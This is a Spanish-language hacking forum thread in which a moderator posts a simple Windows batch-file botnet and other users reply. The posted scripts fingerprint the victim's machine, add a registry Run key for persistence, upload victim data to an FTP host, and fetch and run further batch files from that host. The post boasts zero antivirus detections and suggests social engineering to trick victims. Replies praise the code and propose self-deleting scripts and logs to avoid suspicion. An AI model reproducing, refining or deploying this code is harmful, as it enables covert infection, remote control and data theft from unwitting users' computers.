comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Botnet sencila [Batch]

  • 6 Respuestas
  • 3368 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado rollth

  • *
  • Moderador
  • Mensajes: 874
  • Actividad:
    1.67%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« en: Agosto 15, 2015, 11:10:46 am »
Buenas a todos, vengo a traeros una botnet sencilla 'programada' entera con batch.

Son varios archivos, el primer archivo va a ser este, que lo que hace es descargarse el Fecha.bat (Encargado de contar los pcs y ejecutar el 3º archivo que será el que dé las ordenes definitivas). A este archivo se lo pueden añadir cosas como ingeniería social para engañar a alguien.

Código: DOS
  1. @You are not allowed to view links. Register or Login off
  2.  
  3. You are not allowed to view links. Register or Login C:\Users\%username%
  4.  
  5. You are not allowed to view links. Register or Login ruta=%CD%
  6.  
  7. rem Prepara el archivo que controla las máquinas infectadas.
  8.  
  9. You are not allowed to view links. Register or Login numero=%random%
  10.  
  11. You are not allowed to view links. Register or Login %numero% > numero.txt
  12.  
  13. getmac > %numero%
  14.  
  15. You are not allowed to view links. Register or Login ftp.txt
  16. You are not allowed to view links. Register or Login open host >> ftp.txt
  17. You are not allowed to view links. Register or Login userdown >> ftp.txt
  18. You are not allowed to view links. Register or Login passdown >> ftp.txt
  19. You are not allowed to view links. Register or Login get Fecha.bat >> ftp.txt
  20. You are not allowed to view links. Register or Login quit >> ftp.txt
  21.  
  22. start /min ftp -s:ftp.txt
  23.  
  24. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v winReg32 /t REG_SZ /d %ruta%\Fecha.bat
  25.  

SHA256: 14b4db4fcb1778e4ee709d200b1b60db91e5dde5062ca3abcab66233eaa35907 
Nombre: Malware.bat
Detecciones: 0 / 56 
Fecha de análisis: 2015-08-15 13:53:25 UTC ( hace 1 minuto ) 

El Segundo archivo sería el que se encarga de descargar e iniciar un tercer archivo que se ejecutaría, además contabiliza los pcs infectados.

Código: DOS
  1. @You are not allowed to view links. Register or Login off
  2.  
  3. rem Crea un txt con la fecha y hora actual.
  4.  
  5. rem Lee el número del archivo numero.txt
  6.  
  7. You are not allowed to view links. Register or Login /f "tokens=*" %%x You are not allowed to view links. Register or Login (numero.txt) You are not allowed to view links. Register or Login (
  8. You are not allowed to view links. Register or Login nombre=%%x
  9. You are not allowed to view links. Register or Login escribir
  10. )
  11.  
  12. :escribir
  13.  
  14. rem Escribe el archivo
  15.  
  16. You are not allowed to view links. Register or Login ----------------- >> %nombre%
  17. You are not allowed to view links. Register or Login fecha: %date% >> %nombre%
  18. You are not allowed to view links. Register or Login hora: %time% >> %nombre%
  19.  
  20. rem Envía el archivo.
  21.  
  22. You are not allowed to view links. Register or Login ftp.txt
  23. You are not allowed to view links. Register or Login ftp1.txt
  24. You are not allowed to view links. Register or Login open host >> ftp.txt
  25. You are not allowed to view links. Register or Login userfecha>> ftp.txt
  26. You are not allowed to view links. Register or Login passfecha>> ftp.txt
  27. You are not allowed to view links. Register or Login put %nombre% >> ftp.txt
  28. You are not allowed to view links. Register or Login quit >> ftp.txt
  29.  
  30. start /min ftp -s:ftp.txt
  31.  
  32. rem Ejecuta el archivo que he subido
  33.  
  34. You are not allowed to view links. Register or Login open host >> ftp1.txt
  35. You are not allowed to view links. Register or Login userdown>> ftp1.txt
  36. You are not allowed to view links. Register or Login passdown>> ftp1.txt
  37. You are not allowed to view links. Register or Login get eject.bat >> ftp1.txt
  38. You are not allowed to view links. Register or Login quit >> ftp1.txt
  39.  
  40. start /min ftp -s:ftp1.txt
  41.  
  42. timeout /t 15
  43.  
  44. start eject.bat

SHA256: 62b766ad33d7bea8959d463b44909b0d37ba61963cd8ad1e32f57e4547954456 
Nombre: Fecha.bat
Detecciones: 0 / 56 
Fecha de análisis: 2015-08-15 14:04:47 UTC ( hace 0 minutos ) 

Los timeout los pongo porque el host que utilizo es lento,

En cuanto a las cuentas ftp hice dos y dos carpetas diferentes, una carpeta para las descargas, que solo pueda descargar, para eject.bat y fecha.bat y otra carpeta llamada Infectados con otra cuenta que solo puede subir archivos.

Acepto ideas y criticas

!Saludos¡

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado blackdrake

  • *
  • Moderator
  • Mensajes: 1892
  • Actividad:
    15%
  • Reputación 14
    • Ver Perfil
« Respuesta #1 en: Agosto 15, 2015, 04:51:01 pm »
Nada mal @You are not allowed to view links. Register or Login, doy por hecho que lo has programado tu no?

Saludos.



Conectado rollth

  • *
  • Moderador
  • Mensajes: 874
  • Actividad:
    1.67%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #2 en: Agosto 15, 2015, 05:35:05 pm »
You are not allowed to view links. Register or Login
Nada mal @You are not allowed to view links. Register or Login, doy por hecho que lo has programado tu no?

Saludos.

@You are not allowed to view links. Register or Login si, lo he programado yo, es sencillo pero puede servir.


Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Conectado roadd

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Hacking Desde Cero By Roadd Dogg
  • Skype: r0add@hotmail.com
  • Twitter: @RoaddHDC
« Respuesta #3 en: Agosto 15, 2015, 08:14:24 pm »
Me encanta la idea y el programa! :D
No te estas dando cuenta pero de a poco vas programando modularmente un buen y completo troyano
Web: You are not allowed to view links. Register or Login
Igm: /secureart
Telegram: @roaddhdc
Correo: r0add@hotmail.com
Face: /roaddhdc
Twitter: @roaddhdc
Youtube: You are not allowed to view links. Register or Login

Desconectado xxneeco83xx

  • *
  • Underc0der
  • Mensajes: 46
  • Actividad:
    0%
  • Reputación 0
  • ASM/C/C++/VB/Delphi
    • Ver Perfil
    • Email
  • Skype: nico.buzzi
« Respuesta #4 en: Agosto 15, 2015, 11:33:50 pm »
muy bueno ROLLTH.
Como sugerencias e ideas, como tu mismo dijiste que aceptabas, se me ocurre
que un solo batch genere al resto de los demás batch, y así mismo los valla borrando junto con los logs que envía luego de haberlos enviado
de esa forma seria mas fácil la infección y menos sospechoso que quedaran logs sueltos :)
El arte de crear malware, es algo que solo pocos entienden!


Conectado rollth

  • *
  • Moderador
  • Mensajes: 874
  • Actividad:
    1.67%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #5 en: Agosto 16, 2015, 05:17:49 am »
Muchas gracias @You are not allowed to view links. Register or Login

@You are not allowed to view links. Register or Login Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado xxneeco83xx

  • *
  • Underc0der
  • Mensajes: 46
  • Actividad:
    0%
  • Reputación 0
  • ASM/C/C++/VB/Delphi
    • Ver Perfil
    • Email
  • Skype: nico.buzzi
« Respuesta #6 en: Agosto 16, 2015, 05:21:39 am »
You are not allowed to view links. Register or Login
Muchas gracias @You are not allowed to view links. Register or Login

@You are not allowed to view links. Register or Login Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...

claro, que un solo batch valla generando el resto.
y a medida que cada batch secundario termine de ejecutarse se elimine.
así evitarías problemas.
El arte de crear malware, es algo que solo pocos entienden!


 

¿Te gustó el post? COMPARTILO!



Ares-Python Botnet

Iniciado por d0r127

Respuestas: 1
Vistas: 2112
Último mensaje Diciembre 29, 2016, 06:33:30 pm
por sadfud
Spacenet-Python Botnet

Iniciado por lucky1234

Respuestas: 2
Vistas: 888
Último mensaje Febrero 13, 2018, 02:16:16 pm
por Spaceb4r